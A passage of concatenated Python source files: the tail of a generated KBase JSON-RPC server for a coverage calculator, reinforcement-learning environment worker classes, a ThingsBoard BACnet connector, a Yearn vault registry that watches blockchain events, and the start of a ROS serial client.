if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'Coverage_Calculator'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_Coverage_Calculator.run_Coverage_Calculator,
name='Coverage_Calculator.run_Coverage_Calculator',
types=[dict])
self.method_authentication['Coverage_Calculator.run_Coverage_Calculator'] = 'required' # noqa
self.rpc_service.add(impl_Coverage_Calculator.status,
name='Coverage_Calculator.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'Coverage_Calculator ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
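def run_server_briefly(seconds=5):
    '''Hedged usage sketch (illustration only, not part of the generated
    server): start the service in a child process on an OS-assigned port,
    keep it alive briefly, then stop it again.'''
    import time
    port = start_server(newprocess=True)
    time.sleep(seconds)
    stop_server()
    return port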
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
distributed.py
|
'''Builders for distributed training.'''
import multiprocessing
import numpy as np
class Sequential:
'''A group of environments used in sequence.'''
def __init__(self, environment_builder, max_episode_steps, workers):
self.environments = [environment_builder() for _ in range(workers)]
self.max_episode_steps = max_episode_steps
self.observation_space = self.environments[0].observation_space
self.action_space = self.environments[0].action_space
self.name = self.environments[0].name
def initialize(self, seed):
for i, environment in enumerate(self.environments):
environment.seed(seed + i)
def start(self):
'''Used once to get the initial observations.'''
observations = [env.reset() for env in self.environments]
self.lengths = np.zeros(len(self.environments), int)
return np.array(observations, np.float32)
def step(self, actions):
next_observations = [] # Observations for the transitions.
rewards = []
resets = []
terminations = []
observations = [] # Observations for the actions selection.
for i in range(len(self.environments)):
ob, rew, term, _ = self.environments[i].step(actions[i])
self.lengths[i] += 1
# Timeouts trigger resets but are not true terminations.
reset = term or self.lengths[i] == self.max_episode_steps
next_observations.append(ob)
rewards.append(rew)
resets.append(reset)
terminations.append(term)
if reset:
ob = self.environments[i].reset()
self.lengths[i] = 0
observations.append(ob)
observations = np.array(observations, np.float32)
infos = dict(
observations=np.array(next_observations, np.float32),
rewards=np.array(rewards, np.float32),
resets=np.array(resets, bool),
terminations=np.array(terminations, bool))
return observations, infos
def render(self, mode='human', *args, **kwargs):
outs = []
for env in self.environments:
out = env.render(mode=mode, *args, **kwargs)
outs.append(out)
if mode != 'human':
return np.array(outs)
class Parallel:
'''A group of sequential environments used in parallel.'''
def __init__(
self, environment_builder, worker_groups, workers_per_group,
max_episode_steps
):
self.environment_builder = environment_builder
self.worker_groups = worker_groups
self.workers_per_group = workers_per_group
self.max_episode_steps = max_episode_steps
def initialize(self, seed):
def proc(action_pipe, index, seed):
'''Process holding a sequential group of environments.'''
envs = Sequential(
self.environment_builder, self.max_episode_steps,
self.workers_per_group)
envs.initialize(seed)
observations = envs.start()
self.output_queue.put((index, observations))
while True:
actions = action_pipe.recv()
out = envs.step(actions)
self.output_queue.put((index, out))
dummy_environment = self.environment_builder()
self.observation_space = dummy_environment.observation_space
self.action_space = dummy_environment.action_space
del dummy_environment
self.started = False
self.output_queue = multiprocessing.Queue()
self.action_pipes = []
for i in range(self.worker_groups):
pipe, worker_end = multiprocessing.Pipe()
self.action_pipes.append(pipe)
group_seed = seed + i * self.workers_per_group
process = multiprocessing.Process(
target=proc, args=(worker_end, i, group_seed))
process.daemon = True
process.start()
def start(self):
'''Used once to get the initial observations.'''
assert not self.started
self.started = True
observations_list = [None for _ in range(self.worker_groups)]
for _ in range(self.worker_groups):
index, observations = self.output_queue.get()
observations_list[index] = observations
self.observations_list = np.array(observations_list)
self.next_observations_list = np.zeros_like(self.observations_list)
self.rewards_list = np.zeros(
(self.worker_groups, self.workers_per_group), np.float32)
self.resets_list = np.zeros(
(self.worker_groups, self.workers_per_group), bool)
self.terminations_list = np.zeros(
(self.worker_groups, self.workers_per_group), bool)
return np.concatenate(self.observations_list)
def step(self, actions):
actions_list = np.split(actions, self.worker_groups)
for actions, pipe in zip(actions_list, self.action_pipes):
pipe.send(actions)
for _ in range(self.worker_groups):
index, (observations, infos) = self.output_queue.get()
self.observations_list[index] = observations
self.next_observations_list[index] = infos['observations']
self.rewards_list[index] = infos['rewards']
self.resets_list[index] = infos['resets']
self.terminations_list[index] = infos['terminations']
observations = np.concatenate(self.observations_list)
infos = dict(
observations=np.concatenate(self.next_observations_list),
rewards=np.concatenate(self.rewards_list),
resets=np.concatenate(self.resets_list),
terminations=np.concatenate(self.terminations_list))
return observations, infos
def distribute(environment_builder, worker_groups=1, workers_per_group=1):
'''Distributes workers over parallel and sequential groups.'''
dummy_environment = environment_builder()
max_episode_steps = dummy_environment.max_episode_steps
del dummy_environment
if worker_groups < 2:
return Sequential(
environment_builder, max_episode_steps=max_episode_steps,
workers=workers_per_group)
return Parallel(
environment_builder, worker_groups=worker_groups,
workers_per_group=workers_per_group,
max_episode_steps=max_episode_steps)
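# Hedged usage sketch (illustration only): a minimal stand-in environment
# showing the interface distribute() expects (seed/reset/step plus the
# observation_space, action_space, name and max_episode_steps attributes).
if __name__ == '__main__':
    class _ToyEnvironment:
        observation_space = (1,)
        action_space = (1,)
        name = 'toy'
        max_episode_steps = 10

        def seed(self, seed):
            pass

        def reset(self):
            return np.zeros(1, np.float32)

        def step(self, action):
            return np.zeros(1, np.float32), 0.0, False, {}

    environments = distribute(_ToyEnvironment, worker_groups=1, workers_per_group=2)
    environments.initialize(seed=0)
    observations = environments.start()
    observations, infos = environments.step(np.zeros((2, 1), np.float32))
    print(observations.shape, infos['rewards'])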
|
bacnet_connector.py
|
# Copyright 2022. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from queue import Queue
from random import choice
from string import ascii_lowercase
from threading import Thread
from time import sleep, time
from thingsboard_gateway.tb_utility.tb_loader import TBModuleLoader
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
try:
from bacpypes.core import run, stop
except ImportError:
print("BACnet library not found - installing...")
TBUtility.install_package("bacpypes", ">=0.18.0")
from bacpypes.core import run, stop
from bacpypes.pdu import Address, GlobalBroadcast, LocalBroadcast, LocalStation, RemoteStation
from thingsboard_gateway.connectors.connector import Connector, log
from thingsboard_gateway.connectors.bacnet.bacnet_utilities.tb_gateway_bacnet_application import TBBACnetApplication
class BACnetConnector(Thread, Connector):
def __init__(self, gateway, config, connector_type):
self._connector_type = connector_type
self.statistics = {'MessagesReceived': 0,
'MessagesSent': 0}
super().__init__()
self.__config = config
self.setName(config.get('name', 'BACnet ' + ''.join(choice(ascii_lowercase) for _ in range(5))))
self.__devices = []
self.__device_indexes = {}
self.__devices_address_name = {}
self.__gateway = gateway
self._application = TBBACnetApplication(self, self.__config)
self.__bacnet_core_thread = Thread(target=run, name="BACnet core thread", daemon=True,
kwargs={"sigterm": None, "sigusr1": None})
self.__bacnet_core_thread.start()
self.__stopped = False
self.__config_devices = self.__config["devices"]
self.default_converters = {
"uplink_converter": TBModuleLoader.import_module(self._connector_type, "BACnetUplinkConverter"),
"downlink_converter": TBModuleLoader.import_module(self._connector_type, "BACnetDownlinkConverter")}
self.__request_functions = {"writeProperty": self._application.do_write_property,
"readProperty": self._application.do_read_property,
"risingEdge": self._application.do_binary_rising_edge}
self.__available_object_resources = {}
self.rpc_requests_in_progress = {}
self.__connected = False
self.daemon = True
self.__convert_and_save_data_queue = Queue()
def open(self):
self.__stopped = False
self.start()
def run(self):
self.__connected = True
self.scan_network()
self._application.do_whois()
log.debug("WhoIsRequest has been sent.")
self.scan_network()
while not self.__stopped:
sleep(.2)
for device in self.__devices:
try:
if device.get("previous_check") is None or time() * 1000 - device["previous_check"] >= device[
"poll_period"]:
for mapping_type in ["attributes", "telemetry"]:
for config in device[mapping_type]:
if config.get("uplink_converter") is None or config.get("downlink_converter") is None:
self.__load_converters(device)
data_to_application = {
"device": device,
"mapping_type": mapping_type,
"config": config,
"callback": self.__bacnet_device_mapping_response_cb
}
self._application.do_read_property(**data_to_application)
device["previous_check"] = time() * 1000
else:
sleep(.2)
except Exception as e:
log.exception(e)
if not self.__convert_and_save_data_queue.empty():
for _ in range(self.__convert_and_save_data_queue.qsize()):
thread = Thread(target=self.__convert_and_save_data, args=(self.__convert_and_save_data_queue,),
daemon=True)
thread.start()
def close(self):
self.__stopped = True
self.__connected = False
stop()
def get_name(self):
return self.name
def is_connected(self):
return self.__connected
def on_attributes_update(self, content):
try:
log.debug('Received Attribute Update Request: %r', str(content))
for device in self.__devices:
if device["deviceName"] == content["device"]:
for request in device["attribute_updates"]:
if request["config"].get("requestType") is not None:
for attribute in content["data"]:
if attribute == request["key"]:
request["iocb"][1]["config"].update({"propertyValue": content["data"][attribute]})
kwargs = request["iocb"][1]
iocb = request["iocb"][0](device, **kwargs)
self.__request_functions[request["config"]["requestType"]](iocb)
return
else:
log.error("\"requestType\" not found in request configuration for key %s device: %s",
request.get("key", "[KEY IS EMPTY]"),
device["deviceName"])
except Exception as e:
log.exception(e)
def server_side_rpc_handler(self, content):
try:
log.debug('Received RPC Request: %r', str(content))
for device in self.__devices:
if device["deviceName"] == content["device"]:
method_found = False
for request in device["server_side_rpc"]:
if request["config"].get("requestType") is not None:
if content["data"]["method"] == request["method"]:
method_found = True
kwargs = request["iocb"][1]
timeout = time() * 1000 + request["config"].get("requestTimeout", 200)
if content["data"].get("params") is not None:
kwargs["config"].update({"propertyValue": content["data"]["params"]})
iocb = request["iocb"][0](device, **kwargs)
self.__request_functions[request["config"]["requestType"]](device=iocb,
callback=self.__rpc_response_cb)
self.rpc_requests_in_progress[iocb] = {"content": content,
"uplink_converter": request["uplink_converter"]}
# self.__gateway.register_rpc_request_timeout(content,
# timeout,
# iocb,
# self.__rpc_cancel_processing)
else:
log.error("\"requestType\" not found in request configuration for key %s device: %s",
request.get("key", "[KEY IS EMPTY]"),
device["deviceName"])
if not method_found:
log.error("RPC method %s not found in configuration", content["data"]["method"])
self.__gateway.send_rpc_reply(content["device"], content["data"]["id"], success_sent=False)
except Exception as e:
log.exception(e)
def __rpc_response_cb(self, iocb, callback_params=None):
device = self.rpc_requests_in_progress[iocb]
converter = device["uplink_converter"]
content = device["content"]
if iocb.ioResponse:
apdu = iocb.ioResponse
log.debug("Received callback with Response: %r", apdu)
converted_data = converter.convert(None, apdu)
if converted_data is None:
converted_data = {"success": True}
self.__gateway.send_rpc_reply(content["device"], content["data"]["id"], converted_data)
# self.__gateway.rpc_with_reply_processing(iocb, converted_data or {"success": True})
elif iocb.ioError:
log.exception("Received callback with Error: %r", iocb.ioError)
data = {"error": str(iocb.ioError)}
self.__gateway.send_rpc_reply(content["device"], content["data"]["id"], data)
log.debug(iocb.ioError)
else:
log.error("Received unknown RPC response callback from device: %r", iocb)
def __rpc_cancel_processing(self, iocb):
log.info("RPC with iocb %r - cancelled.", iocb)
def scan_network(self):
self._application.do_whois()
log.debug("WhoIsRequest has been sent.")
for device in self.__config_devices:
try:
if self._application.check_or_add(device):
for mapping_type in ["attributes", "timeseries"]:
for config in device[mapping_type]:
if config.get("uplink_converter") is None or config.get("downlink_converter") is None:
self.__load_converters(device)
data_to_application = {
"device": device,
"mapping_type": mapping_type,
"config": config,
"callback": self.__bacnet_device_mapping_response_cb
}
self._application.do_read_property(**data_to_application)
except Exception as e:
log.exception(e)
def __convert_and_save_data(self, queue):
converter, mapping_type, config, iocb = queue.get()
converted_data = {}
try:
converted_data = converter.convert((mapping_type, config),
iocb.ioResponse if iocb.ioResponse else iocb.ioError)
except Exception as e:
log.exception(e)
self.__gateway.send_to_storage(self.name, converted_data)
def __bacnet_device_mapping_response_cb(self, iocb, callback_params):
mapping_type = callback_params["mapping_type"]
config = callback_params["config"]
converted_data = {}
converter = callback_params["config"].get("uplink_converter")
if converter is None:
for device in self.__devices:
self.__load_converters(device)
else:
converter = callback_params["config"].get("uplink_converter")
try:
converted_data = converter.convert((mapping_type, config),
iocb.ioResponse if iocb.ioResponse else iocb.ioError)
except Exception as e:
log.exception(e)
self.__gateway.send_to_storage(self.name, converted_data)
def __load_converters(self, device):
datatypes = ["attributes", "telemetry", "attribute_updates", "server_side_rpc"]
for datatype in datatypes:
for datatype_config in device.get(datatype, []):
try:
for converter_type in self.default_converters:
converter_object = self.default_converters[converter_type] if datatype_config.get(
"class") is None else TBModuleLoader.import_module(self._connector_type,
device.get("class"))
datatype_config[converter_type] = converter_object(device)
except Exception as e:
log.exception(e)
def add_device(self, data):
if self.__devices_address_name.get(data["address"]) is None:
for device in self.__config_devices:
if device["address"] == data["address"]:
try:
config_address = Address(device["address"])
device_name_tag = TBUtility.get_value(device["deviceName"], get_tag=True)
device_name = device["deviceName"].replace("${" + device_name_tag + "}", data.pop("name"))
device_information = {
**data,
**self.__get_requests_configs(device),
"type": device["deviceType"],
"config": device,
"attributes": device.get("attributes", []),
"telemetry": device.get("timeseries", []),
"poll_period": device.get("pollPeriod", 5000),
"deviceName": device_name,
}
if config_address == data["address"] or \
isinstance(config_address, GlobalBroadcast) or \
(isinstance(config_address, LocalBroadcast) and isinstance(device["address"],
LocalStation)) or \
(isinstance(config_address, (LocalStation, RemoteStation)) and isinstance(
data["address"], (
LocalStation, RemoteStation))):
self.__devices_address_name[data["address"]] = device_information["deviceName"]
self.__devices.append(device_information)
log.debug(data["address"].addrType)
except Exception as e:
log.exception(e)
def __get_requests_configs(self, device):
result = {"attribute_updates": [], "server_side_rpc": []}
for request in device.get("attributeUpdates", []):
kwarg_dict = {
"config": request,
"request_type": request["requestType"]
}
request_config = {
"key": request["key"],
"iocb": (self._application.form_iocb, kwarg_dict),
"config": request
}
result["attribute_updates"].append(request_config)
for request in device.get("serverSideRpc", []):
kwarg_dict = {
"config": request,
"request_type": request["requestType"]
}
request_config = {
"method": request["method"],
"iocb": (self._application.form_iocb, kwarg_dict),
"config": request
}
result["server_side_rpc"].append(request_config)
return result
|
registry.py
|
import logging
import threading
import time
from typing import List
from brownie import Contract, chain, web3
from joblib import Parallel, delayed
from web3._utils.abi import filter_by_name
from web3._utils.events import construct_event_topic_set
from yearn.events import create_filter, decode_logs, get_logs_asap
from yearn.multicall2 import fetch_multicall
from yearn.prices import magic
from yearn.utils import contract_creation_block, Singleton
from yearn.v2.vaults import Vault
logger = logging.getLogger(__name__)
class Registry(metaclass=Singleton):
def __init__(self):
self.releases = {} # api_version => template
self._vaults = {} # address -> Vault
self._experiments = {} # address => Vault
self.governance = None
self.tags = {}
# track older registries to pull experiments
self.registries = self.load_from_ens()
# load registry state in the background
self._done = threading.Event()
self._thread = threading.Thread(target=self.watch_events, daemon=True)
self._thread.start()
def load_from_ens(self):
resolver = Contract('0x4976fb03C32e5B8cfe2b6cCB31c09Ba78EBaBa41')
topics = construct_event_topic_set(
filter_by_name('AddressChanged', resolver.abi)[0],
web3.codec,
{'node': web3.ens.namehash('v2.registry.ychad.eth')},
)
events = decode_logs(get_logs_asap(str(resolver), topics))
logger.info('loaded %d registry versions', len(events))
return [Contract(event['newAddress']) for event in events]
@property
def vaults(self) -> List[Vault]:
self._done.wait()
return list(self._vaults.values())
@property
def experiments(self) -> List[Vault]:
self._done.wait()
return list(self._experiments.values())
def __repr__(self) -> str:
self._done.wait()
return f"<Registry releases={len(self.releases)} vaults={len(self.vaults)} experiments={len(self.experiments)}>"
def load_vaults(self):
if not self._thread._started.is_set():
self._thread.start()
self._done.wait()
def watch_events(self):
start = time.time()
self.log_filter = create_filter([str(addr) for addr in self.registries])
for block in chain.new_blocks(height_buffer=12):
logs = self.log_filter.get_new_entries()
self.process_events(decode_logs(logs))
if not self._done.is_set():
self._done.set()
logger.info("loaded v2 registry in %.3fs", time.time() - start)
time.sleep(300)
def process_events(self, events):
for event in events:
logger.debug("%s %s %s", event.address, event.name, dict(event))
if event.name == "NewGovernance":
self.governance = event["governance"]
if event.name == "NewRelease":
self.releases[event["api_version"]] = Contract(event["template"])
if event.name == "NewVault":
# experiment was endorsed
if event["vault"] in self._experiments:
vault = self._experiments.pop(event["vault"])
vault.name = f"{vault.vault.symbol()} {event['api_version']}"
self._vaults[event["vault"]] = vault
logger.debug("endorsed vault %s %s", vault.vault, vault.name)
# we already know this vault from another registry
elif event["vault"] not in self._vaults:
vault = self.vault_from_event(event)
vault.name = f"{vault.vault.symbol()} {event['api_version']}"
self._vaults[event["vault"]] = vault
logger.debug("new vault %s %s", vault.vault, vault.name)
if event.name == "NewExperimentalVault":
vault = self.vault_from_event(event)
vault.name = f"{vault.vault.symbol()} {event['api_version']} {event['vault'][:8]}"
self._experiments[event["vault"]] = vault
logger.debug("new experiment %s %s", vault.vault, vault.name)
if event.name == "VaultTagged":
self.tags[event["vault"]] = event["tag"]
def vault_from_event(self, event):
return Vault(
vault=Contract.from_abi("Vault", event["vault"], self.releases[event["api_version"]].abi),
token=event["token"],
api_version=event["api_version"],
registry=self,
)
def load_strategies(self):
# stagger loading strategies to not run out of connections in the pool
vaults = self.vaults + self.experiments
Parallel(8, "threading")(delayed(vault.load_strategies)() for vault in vaults)
def load_harvests(self):
vaults = self.vaults + self.experiments
Parallel(8, "threading")(delayed(vault.load_harvests)() for vault in vaults)
def describe(self, block=None):
vaults = self.vaults + self.experiments
results = Parallel(8, "threading")(delayed(vault.describe)(block=block) for vault in vaults)
return {vault.name: result for vault, result in zip(vaults, results)}
def total_value_at(self, block=None):
vaults = self.active_vaults_at(block)
prices = Parallel(8, "threading")(delayed(magic.get_price)(str(vault.token), block=block) for vault in vaults)
results = fetch_multicall(*[[vault.vault, "totalAssets"] for vault in vaults], block=block)
return {vault.name: assets * price / vault.scale for vault, assets, price in zip(vaults, results, prices)}
def active_vaults_at(self, block=None):
vaults = self.vaults + self.experiments
if block:
vaults = [vault for vault in vaults if contract_creation_block(str(vault.vault)) <= block]
# fixes edge case: a vault is not necessarily initialized on creation
activations = fetch_multicall(*[[vault.vault, 'activation'] for vault in vaults], block=block)
return [vault for vault, activation in zip(vaults, activations) if activation]
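if __name__ == '__main__':
    # Hedged usage sketch (illustration only): requires an active brownie
    # network connection; __repr__ blocks until the background event thread
    # has finished its first pass over the registry logs.
    registry = Registry()
    print(registry)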
|
SerialClient.py
|
#!/usr/bin/env python
#####################################################################
# Software License Agreement (BSD License)
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
__author__ = "mferguson@willowgarage.com (Michael Ferguson)"
import roslib
import sys
import errno
import rospy
import thread
import multiprocessing
from serial import *
import StringIO
from std_msgs.msg import Time
from rosserial_msgs.msg import *
from rosserial_msgs.srv import *
import diagnostic_msgs.msg
import socket
import time
import struct
import signal
def load_pkg_module(package, directory):
# check if it's in the Python path
in_path = False
path = sys.path
pkg_src = package+'/src' #check for the source directory which
# is added to path by roslib bootstrapping
for entry in sys.path:
if pkg_src in entry:
in_path = True
if not in_path:
roslib.load_manifest(package)
